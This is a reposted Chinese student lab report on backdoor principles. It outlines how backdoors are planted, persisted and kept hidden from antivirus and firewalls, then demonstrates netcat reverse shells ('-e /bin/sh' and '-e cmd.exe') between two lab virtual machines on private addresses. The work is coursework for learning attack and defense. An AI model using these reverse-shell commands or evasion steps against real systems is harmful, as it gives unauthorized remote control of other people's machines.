码迷,mamicode.com
首页 > 其他好文 > 详细

2019-2020-2 网络对抗技术 20175311胡济栋 Exp2 后门原理与实践

时间:2020-03-10 19:55:25      阅读:50      评论:0      收藏:0      [点我收藏+]

标签:telnet   ima   概念   windows   攻击   ali   操作系统   命令   用户   

2019-2020-2 网络对抗技术 20175311胡济栋 Exp2 后门原理与实践

一、实验介绍

1.后门原理概念

  • 后门就是不通过正常认证流程而非法访问操作系统的通道,一般编译器、操作系统、应用程序中都可能留有后门。

2.后门操作流程

  • 获取常用后门程序,如netcat系列、meterpreter、intersect等
  • 通过软件程序自带、诱骗下载、恶意攻击等方式将后门植入电脑系统中
  • 通过开机自启动、win的定时任务、linux的cron服务或诱骗用户点击等方式进行成功运行
  • 避免被恶意代码检测程序发现,躲避恶意代码免杀技术
  • 传送数据时避免被本机或网络的防火墙发现(反弹式连接、加密连接、隧道技术)

二、实验过程

1.常用后门工具之NC或netcat

  • netcat,又名nc、ncat,是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
  • nc 的基本功能如下:telnet / 获取系统 banner 信息、传输文本信息、传输文件和目录、加密传输文件、端口扫描、远程控制 / 正方向 shell、流媒体服务器、远程克隆硬盘。

2.Win下获得Linux Shell

  • 获得Win的IP地址,其中我的Win7IP地址为192.168.40.133
    技术图片
  • Windows打开监听,使用ncat.exe程序打开监听ncat.exe -l -p 8888
  • 在kali中反弹连接Windows,ncat 192.168.40.133 8888 -e /bin/sh,使用-e选项执行shell程序
  • 可以看到,我们在Win7操作系统中获取得到了kali的文件信息
    技术图片

3.Linux获得Win Shell

  • 获得Kali的IP地址,其中我的KaliIP地址为192.168.40.132
    技术图片
  • 在Kali中运行监听指令nc -l -p 8888
  • Windows反弹连接Kalincat.exe -e cmd.exe 192.168.40.132 8888
  • 可以看到,我们在Kali操作系统中获取得到了Windows的命令指令
    技术图片

三、实验要求

四、实验感想

2019-2020-2 网络对抗技术 20175311胡济栋 Exp2 后门原理与实践

标签:telnet   ima   概念   windows   攻击   ali   操作系统   命令   用户   

原文地址:https://www.cnblogs.com/hujidong42/p/12457968.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!